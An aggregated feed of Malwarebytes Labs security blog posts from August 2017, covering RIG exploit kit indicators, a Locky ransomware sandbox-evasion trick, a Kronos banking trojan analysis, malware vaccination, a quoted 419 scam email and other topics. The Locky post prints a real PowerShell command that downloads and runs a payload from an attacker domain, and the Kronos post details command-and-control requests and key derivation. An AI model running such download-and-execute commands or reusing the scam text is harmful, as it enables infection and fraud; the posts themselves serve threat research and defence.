The exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.

We will update this post with additional information about Princess Locker if there is anything noteworthy to add.

Indicators of compromise

RIG EK gate:

185.198.164.152

RIG EK IP address:

188.225.84.28

PrincessLocker binary:

c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7

PrincessLocker payment page:

royall6qpvndxlsj[.]onion

The post RIG exploit kit distributes Princess ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Locky ransomware adds anti sandbox feature (updated)

Malwarebytes - Thu, 08/31/2017 - 16:09

By Marcelo Rivero and Jérôme Segura

The Locky ransomware has been very active since its return which we documented in a previous blog post. There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.

Malwarebytes researcher Marcelo Rivero discovered a trick documented before with the Dridex Trojan [1] employed by Locky’s affiliate ID 5 to bypass automated analysis done via sandboxes.

Malware authors have used booby trapped Office documents containing macros to retrieve their payloads for some time, but ordinarily, the code executes as soon as the user clicks the ‘Enable Content’ button. For analysis purposes, many sandboxes lower the security settings of various applications and enable macros by default, which allows for the automated capture of the malicious payload.

Strikes when you least expect it

However, this particular Locky campaign no longer simply triggers by running the macro itself but waits until the fake Word document is closed by the user before it starts to invoke a set of commands.

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(‘http://newhostrcm[.]top/admin.php?f=1’, $env:APPDATA + ‘\sATTfJY.exe’); Start-Process $env:APPDATA’\sATTfJY.exe’;

The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note:

Implications

While not a sophisticated technique, it nonetheless illustrates the constant cat and mouse battle between attackers and defenders. We ascertain that in their current form, the malicious documents are likely to exhibit a harmless behavior in many sandboxes while still infecting end users that would logically close the file when they realize there is nothing to be seen.

Malwarebytes blocks this ‘closing the document’ trick:

Overall we can mitigate this threat at different layers:

Click to view slideshow.

 

Indicators of compromise:

Word documents:

b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4 8ca111f79892cb445c44588f1ade817abcbb3f3e39971f0ef7891b90f09de1e9 23d51440e2325808add6a1e338c697adc10fc0fa6d2ae804cc94af3e725c34cf

Locky:

newhostrcm[.]top/admin.php?f=1 doctorfeelk[.]top/admin.php?f=1 47.89.250.152 7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774 933bd8262a34770b06ebe64c800f98d68082c2929af69c3feae7dd4c2aa6a897 References

[1] https://www.proofpoint.com/us/threat-insight/post/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes

The post Locky ransomware adds anti sandbox feature (updated) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BSides Manchester: Malvertising – under the hood

Malwarebytes - Thu, 08/31/2017 - 15:00

I’ve talked about malvertising a fair bit at security events down the years and I was lucky enough to be able to add to the tally at this month’s BSides Manchester conference. Whether your preferred variety is desktop, mobile, or even virtual/augmented reality, there’s hopefully something here for everyone.

“Malvertising: under the hood” covers the following topics:

  • Malvertising definition
  • Publisher/advertiser numbers
  • From old ads to new
  • Fake advertisers and domain shadowing
  • Domain imitation
  • Cloned ads
  • Malvertising gateways
  • Bad ad excuses
  • Ad blocking wars
  • Mobile antics
  • VR / AR

Chris Boyd

The post BSides Manchester: Malvertising – under the hood appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malware vaccination tricks: blue pills or red pills

Malwarebytes - Wed, 08/30/2017 - 18:00

First, let me explain what I mean by malware vaccination tricks. Most of you will have heard about some of these. Vaccination tricks are in fact techniques that use safety checks done by malware against that same malware. The malware checks for the presence of certain files or registry keys as a sign that the machine should not be infected. And users make sure those keys or files are present as a security measure.

Examples of safety checks
  • A lot of malware contains routines to check whether it is running on a Virtual Machine (VM), sandbox or with a debugger. They do this to avoid being detected by many of the automated systems the AV industry uses to deal with the large numbers of malware that surface every second of the day.
  • Some malware check the default language installed on the affected system or the keyboard language. They do this because they shy away from infecting systems in certain countries, or quite the opposite because they target certain countries.
  • Certain types of malware check whether they have already infected a certain machine by creating a certain registry key or dropping a certain file. They do this to avoid problems, conflicts, and monitoring. Especially certain families of ransomware are known to do this.
  • Online checks are another form of testing whether a machine could be run by analysts. The most famous example must be WannaCry.
  • Canary file checks are another type of check, mostly done by ransomware. In these cases, the canary files are files that trigger an alarm as soon as they are being changed. They are designed to alert users that there might be an active ransomware infection, which is encrypting files.
  • Software checks are done to avoid infecting machines that might be recording, debugging, or sending telemetry. Some exploit kits, for example, do not infect machines that are running Malwarebytes to avoid showing up in our telemetry. Other popular software they avoid is Wireshark, which is often used by analysts to capture network traffic.
So how could we use this knowledge? Red pills
  • Installing security software like Malwarebytes and others is obviously a good idea because it not only scares away some malware, but it is foremost an excellent security software.
  • If you can live with the lowered specs that are a result of using virtual machines and sandboxes, this is another good idea to enhance your security. If you use your VM right you can go back to a recent image in case of an emergency. And sandboxes can keep accidents contained within a limited environment.
Blue pills
  • Changing your default language is an option that I would not recommend for people that are not fluent in the language they are installing. From personal past experiences, using different languages side by side on a Windows system can cause Babylonian language confusions on your system.
  • Adding certain registry keys if you are afraid of a particular infection doesn’t hurt your system much, but they are no guarantee for permanent vaccination. If we all start adding HKEY_CURRENT_USER\Software\Locky to our registry, the malware authors will soon design another check and none of us would be protected anymore after they changed it.
  • Adding a keyboard layout that you never plan on using, is a rather harmless method unless you have a tendency to hit two adjoining keys on regular bases (Ctrl+Shift changes the keyboard layout to the next option you have installed). Besides that, most malware use more refined methods to check where you are from.
Impossipills

Some knowledge is good to have and we would like to thank all the researchers for sharing what they found. But the methods that some vaccines require are of no real use unless you are especially afraid of one certain type of malware. There are so many ways for malware to check whether it is running on a VM that it is almost impossible to “fake” all of them so you would have to know what type of check the malware, you are afraid of most, is using. IMHO the same is true for putting all kinds of files on your system that will supposedly stop ransomware from encrypting your files. Some of these vaccines are so much work they would require automation IMHO, like putting a malformed image in every directory holding files which you don’t want to be encrypted by Cerber.

Conclusion

Sometimes vaccines against certain malware are offered by researchers that point out a method you can use to protect against a particular form or variant of malware. We are not saying that these methods do not work, but we would like to point out that applying all these vaccines can easily turn into a full-time job and you still wouldn’t be protected adequately. It is better to make sure your systems are really protected and easily restored than to clutch at every little straw you are offered.

Hint for those that didn’t get the pills reference: “What would Neo do?”

Take care out there and safe surfing.

Pieter Arntz

The post Malware vaccination tricks: blue pills or red pills appeared first on Malwarebytes Labs.

Categories: Techie Feeds

419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola”

Malwarebytes - Tue, 08/29/2017 - 17:10

I’m not saying an email claiming to be from the “Central Bank of Nigeria” with a contact handler named “Rev. Goodluck Ebola” will raise too many red flags, but…

Click to Enlarge

CENTRAL BANK OF NIGERIA
OFFICE OF THE GOVERNOR
Zaria Street, Off Samuel Akintola
Street,Garki 11, Garki-Abuja.

Our Ref: FGN/CBN/NIG/01/2017.

Your Ref………………………….

From The Desk Of Mr. Godwin Emefiele.
Governor, Central Bank of Nigeria (CBN)

SUBJECT: Dear Valued Customer.

Dear Friend,

We wish to inform you that your unclaimed payment of USD$10.5 Million in Africa has been released and ready to be paid to you via PREPAID VISA CARD which you will use to withdraw the US$10.5 Million from any ATM Machine in any part of the world.

We have mandated UBA financial advicers Ghana, to send you the ATM CARD and PIN NUMBER which you will use to withdraw all your US$10.5Million Dollars in any ATM SERVICE MACHINE in any part of the world, but the maximum you can withdraw in a day is US$20,000.00 Only.

You are therefore advice to contact the Head of ATM CARD Department of UBA financial advicers Ghana;

Contact Person: Rev. Goodluck Ebola,
Office email address: [snip]@gmail.com

Tell Rev. Goodluck Ebola, that you received a message from the CENTRAL BANK OF NIGERIA. Instructing him to send you the ATM CARD and PIN NUMBER which you will use to withdraw your USD$10.5 Million Dollars in any ATM SERVICE MACHINE in any part of the world, also send him your direct phone number and contact address where you want him to send the ATM CARD and PIN NUMBER to you.

We are very sorry for the plight you have gone through in the past years.

Thanks for adhering to this instruction and once again accept our congratulations.

Best Regards.

Mr. Godwin Emefiele.
Executive Governor,
Central Bank of Nigeria (CBN).

…I think I just hand stitched fifteen thousand red flags and hung them up around a printout of this email. That this comes from an entirely unrelated .jp (Japan) email address is the icing on the scam sandwich cake. This is indeed a 419 attempt and all that likely waits for you at the other end is:

  • All your money stolen
  • Your bank account used in a money mule scam
  • The sweet embrace of jailtime

Your career as a money mule may also be short lived, assuming the police don’t get you first.

What’s particularly curious here is we’ve primarily seen this one bouncing around via “Rev. Goodluck Egobia” instead of “Ebola”, so we’re not sure if this is an error, a joke, or someone at the spam factory just got bored. Either way, you should avoid replying to any emails similar to the above as it’s 100% guaranteed to be fake.

 

Chris Boyd

The post 419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Inside the Kronos malware – part 2

Malwarebytes - Tue, 08/29/2017 - 15:00

In the previous part of the Kronos analysis, we took a look at the installation process of Kronos and explained the technical details of the tricks that Kronos uses in order to remain more stealthy. Now we will move on to look at the malicious actions that Kronos can perform.

Analyzed samples

Special thanks to @shotgunner101 and @chrisdoman for sharing the samples.

Configuration and targets

Kronos is known as a banking Trojan. For the purpose of enabling and configuring this feature, the bot may download from its CnC additional configuration file. After being fetched, it is stored in the installation folder in encrypted form. (It is worth to notice that when the config is sent over the network it is encrypted using AES CBC mode – but when it is stored on the disk, AES in ECB mode is used.)

Below you can see an example of the installation folder of Kronos, created in %APPDATA%/Microsoft. The folder name is further used as a BotId. Both stored files, the executable and the configuration, has the same name that differs only by the extension:

Here you can see the captured configuration file in a decrypted form:

https://gist.github.com/malwarezone/d6de3d53395849123596f5d9e68fe3a3#file-config-txt

The format of the configuration follows the standard defined by the famous Zeus malware.

The config specifies the external script that is going to be injected in the targeted website, as well as the place of the injection. Below you can see a fragment of the configuration for a sample target – Wells Fargo Bank:

In the given example, the injected script is figrabber.js

It is hosted on the server of the attacker:

The current configuration targets several banks, but also steals credentials for popular services like Google, Twitter, and Facebook.

Indeed, if we open the websites that are targeted by the malware we can see that the injects has been performed. The fragments of code that were defined in the config are implanted in the source of a legitimate website. Some examples included below:

Facebook:

Citibank:

The injected scripts are responsible for opening additional pop-up that is trying to phish the user and steal his/her personal data:

Wells Fargo:

More cases, and their comparison with a normal site behavior before the infection, demonstrated on the video:

The form is customized to fit the theme of each page. However, its content is the same for each target. Overall, the attack is not very sophisticated and it will probably look suspicious to the more advanced users. It’s based purely on social engineering – trying to convince a user to input all personal data that are necessary for banking operations:

Downloader

Apart from infecting browsers and stealing the data, Kronos also has a downloader feature. During our tests, it downloaded a new executable and saved it in the %TEMP%. Payloads are stored in the additional directory with the same name as the main installation directory:

Downloaded payload:

6f7f79dd2a2bf58ba08d03c64ead5ced – nCBngA.exe

The payload is downloaded from Kronos CnC:

…in unencrypted form:

In the analyzed case, downloaded payload was just an update of the Kronos bot. However, the same feature may also be used for fetching and deploying other malware families.

Command and Controll (CnC) server

In the analyzed case, Kronos used Fast-Flux technique for it’s CnC. The domain was resolved to a different IP each time. For example, the domain hjbkjbhkjhbkjhl.info was resolved to an IP address randomly picked from the pool given below:

46.175.146.50 46.172.209.210 47.188.161.114 74.109.250.65 77.122.51.88 77.122.51.88 89.25.31.94 89.185.15.235 91.196.93.112 176.32.5.207 188.25.234.208 109.121.227.191

Watching the communication with the CnC, we observed queries to the site connect.php, with an optional parameter a:

connect.php - initial beacon connect.php?a=0 - sending data to the CnC connect.php?a=1 - downloading the configuration form the Cnc CnC panel

Thanks to the code of the CnC panel that leaked online, we can have more insights on all the functionalities and their implementation. Like most of the malware panels, the Kronos panel is written in PHP and uses MySQL database. Overview of the files:

It turns out, that in total the bot has three commands:

  • a=0 – sends the grabbed page content
  • a=1 – fetch the configuration file
  • a=2 – send the logged windows

Below we can see the relevant fragments of the panel’s code (implemented inside connect.php), responsible for parsing and storing the data uploaded by the respective commands.

Command #0 (a=0):

Command #2 (a=2):

The configuration that is sent to the bot is prepared by the following code:

Command #1 (a=1):

We can also see very clearly how the config is encrypted – using AES in CBC mode, where the key is first 16 bytes of md5 of the BotId (it confirms what researchers form Lexsi lab found by reverse engineering).

However, AES is not the only cryptographic algorithm that is utilized by Kronos. Other commands use BlowFish in ECB mode:

Command #0 (a=0):

Command #2 (a=2):

In all cases, there is a variable called UniqueId that is used as a key. The UniqueId is nothing more but the BotId, that is sent in every POST request in XOR encoded form.

You can find the corresponding Python scripts for decoding the appropriate requests and responses here:

https://github.com/hasherezade/malware_analysis/tree/master/kronos

Kronos comes also with option of adding some plugins, extending the core functionality:

As we may conclude, the plugins are capable of extending Kronos with some espionage capabilities, such as VNC (for viewing the desktop) and logging typed keystrokes.

Decrypting the communication

With the help of prepared scripts (available here), we can decrypt the important elements of the communication between the Kronos bot and the CnC server. Let’s assume that we have a PCAP file with a captured traffic.

The BotId

We need to start from getting the Kronos BotId, because as we know it will be used to derive the encryption keys. We will find it in the requests sent by the bot to its CnC (74 bytes long):

After dumping the request, we can use the following script to decode it:

./kronos_beacon_decoder.py --infile dump1.bin

As the output we will get the decoded beacon, consisting of:

  1. Hash of the configuration file (if no configuration file was present at the moment, this part will be filled with “X” characters)
  2. The BotId

Example:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX{117BB161-6479-4624-858B-4D2CE81593A2}

So, in the demonstrated case the BotId is {117BB161-6479-4624-858B-4D2CE81593A2}.

The configuration

Having the BotId, we can move to decrypt the configuration. It arrives in the response to the a=1 request:

Example of the request followed by the encrypted response from the CnC:

After dumping the response, we can use another script to decode it, giving the BotId as a parameter:

./kronos_a1_decoder.py --datafile dump2.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

As a result, we will get the configuration file. Example of the decoded config:
https://gist.github.com/malwarezone/a7fc13d4142da0c6a67b5e575156c720#file-config-txt

The sent reports

Sometimes we can find the Kronos bot reporting to the CnC in requests a=0 or a=2:

Example of the encrypted request:

Finding out what was exactly the data stolen by Kronos is not difficult if we dump the data and use the dedicated script:

./kronos_a02_decoder.py --datafile dump3.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

Example of the decoded report:
https://gist.github.com/malwarezone/a03fa49de475dfbdb7c499ff2bbb3314#file-a0_req-txt

Conclusion

In terms of code quality, Kronos is written in a decent way, however it’s features are nothing novel. Although the bot got good reviews on underground forums, in terms of popularity it was always legging behind. Probably it’s relatively high price was the important factor deciding why it lost with the competitors.

Appendix

See also:

Inside the Kronos malware – part 1

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post Inside the Kronos malware – part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 21 – August 27)

Malwarebytes - Mon, 08/28/2017 - 17:38

In our blog posts, we announced the introduction of, and explained the necessity for, real-time protection for our Mac and Android users. Also explaining what you can expect them to do for you and answering the questions that we expect to be frequently asked.

We looked at 4 key steps you can take within your business to help gain trust with your employees while educating them to make more secure decisions. And in our “Explained” series we talked about user agent strings and digital forensics.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers Latest updates for Businesses

 

Safe surfing, everyone!

The Malwarebytes Labs Team

 

The post A week in security (August 21 – August 27) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Implications of Google Play Protect

Malwarebytes - Mon, 08/28/2017 - 17:00

Along with the recent release of Google’s new OS, Android 8.0 Oreo, they also released a new security suite known as Google Play Protect. As blogged about in July in Play Protect: Android’s new security system is now available, this new suite has been available since mid-May.

To reiterate

As noted in our July blog, the new Find My Phone does exactly what the name implies. You can also lock the phone remotely, display a message on the phone, call the phone through a browser, or even erase all the data on the phone with this feature. I personally hope this will help alleviate the use of shady monitoring apps. There is also Google’s Safe Browsing that stops you before you proceed to an unsafe site via Chrome. This feature has been around for a while.

50 billion apps, oh my!

Of most interest is Google’s security suite is its new scanning capabilities. Google boasts it can scan 50 billion apps daily, and uses machine learning to weed out the bad stuff. For quite some time, Google has been vetting apps before allowing them in the Google Play Store. Until now, they had no way to verify that the apps stayed vetted after install. This new capability allows Google to scan apps after installation, as well. Not only does it scan apps installed from Google Play, but it also scans apps installed from third-party sites.

The ability to scan apps after install will aid in detecting apps that are set to hide their malicious activity for a set amount of time or after an update — i.e., a malicious app may wait a week before doing anything malicious to hide its presence from malware researchers and scanners. Google claims that if an app that was once acting safely is suddenly doing something malicious, it will flag it.

This machine learning you talk about…

The use of machine learning to detect malware is far from a new concept. Regarding malware detection, it typically works by pooling things into two groups — a good group and a bad group. It then learns every trait it can about each group. If anything looks out of the ordinary from the good group and/or displays traits from the bad group, it’s flagged.

I can only assume Google is using anything on Google Play, that per Google “undergo rigorous security testing,” to pool in the good group. If the trait of the app changes from when it was verified to get into Google Play — bam, it’s flagged!

Grey is the new black

This all sounds great, but malware authors are already ahead of the curve. We have seen the rise of apps that lie in the “gray” area or better known as Potentially Unwanted Programs (PUPs).  Rather than making obviously malicious (black) apps, malware authors are creating apps that are rather questionable.

Most come in the form of a PUP subcategory known as adware.  Ads aren’t inherently malicious, and many apps from the Google Play Store have ads to keep the apps free. There’s a thin line between a good ad and what we call adware. If the ad behavior starts acting overly aggressive or does something out of line like collecting overly personal information, it’s considered adware.  The uncertainty of whether an ad is good or not can mean adware can slip into Google Play undetected for long periods of time. If my hunch is correct, these apps would also be in the machine learners “good” group if they made it into Google Play.

Clickers, too

Another concern is the more malicious Trojan.Clicker. This malware simply “clicks” on ad websites in the background repeatedly to gain revenue. The simplicity of the code makes it difficult to detect. Malicious clicker apps have been known to slip into Google Play.

Kudos to Google

I, for one, am very happy to see Google taking more steps to keep users safe. Concerning machine learning, the more data you have, the better it will be at detecting. Google has an abundance of data, which gives me high hopes of its abilities.

As a malware researcher, should I start beefing up my resume to find a new field now that Google is on the case? Not likely as malware authors have and always will find ways around detection. The new scanner will indeed help things, but it certainly isn’t a stop-all for mobile malware. Trust me, if I could retire from the mobile malware industry knowing the world is safe to a less stressful job as a goat herder, I would. Until then, stay safe out there.

 

Nathan Collier

The post Mobile Menace Monday: Implications of Google Play Protect appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: digital forensics

Malwarebytes - Fri, 08/25/2017 - 15:30
What is it?

Digital forensics is a modern day field of forensic science, which deals with the recovery and investigation of material found in digital devices. When needed, this is often because of a (cyber) crime, whether suspected or established. The most common reasons for performing digital forensics are:

  • attribution
  • identifying a leak within an organization
  • assessing the possible damage that occurred during a breach

The field of digital forensics is divided up into several subdivisions, depending on the nature of the digital device that is the subject of the investigation:

  • computer forensics
  • network forensics
  • forensic data analysis
  • mobile device forensics
What does it take?

Working in this field combines the excitement of solving a puzzle with the data at hand and requires a deep understanding of the software and hardware involved. The most important skill is to be able to find and interpret the data involved in the crime while minimizing the changes made on the investigated device.

Cause and effect can be difficult to determine without a clear timeline, which adds another dimension to the puzzle of trying to figure out what the initial breach factor was and how the attackers proceeded from there.

What does it have in common with cybersecurity?

Cybersecurity and digital forensics are two fields that have a lot in common. They also provide information to each other. Analyzing a breach may lead to new insights about preventing such a breach, and knowing how certain threats work makes it easier to create a timeline and look for a possible attack vector.

Is attribution always possible?

If anything, attribution is always tough. Sometimes, you can recognize a certain way of programming, but there is no way of telling whether that person wrote that piece of code for this purpose or if someone simply copied it. Attribution by meta data is sometimes possible, but experienced cybercriminals are often times too smart to leave evidence behind. Who benefits from the data that were stolen or destroyed is usually a better indicator of who might be responsible, but motive alone does not count in court.

Conclusion

Digital forensics is a science that is closely related to cyber-security. Digital forensic analysts examine data and devices to find out as much as possible about a breach or crime that involved digital devices.

 

Pieter Arntz

The post Explained: digital forensics appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds